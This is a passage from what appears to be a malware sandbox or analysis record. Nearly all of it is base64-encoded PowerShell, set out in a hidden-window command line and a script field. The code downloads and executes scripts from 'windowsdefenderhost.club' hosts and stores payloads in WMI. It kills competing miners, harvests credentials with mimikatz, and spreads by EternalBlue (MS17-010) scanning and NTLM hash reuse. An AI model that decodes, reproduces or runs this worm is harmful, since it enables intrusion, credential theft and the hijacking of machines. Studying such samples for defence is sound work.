BuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACA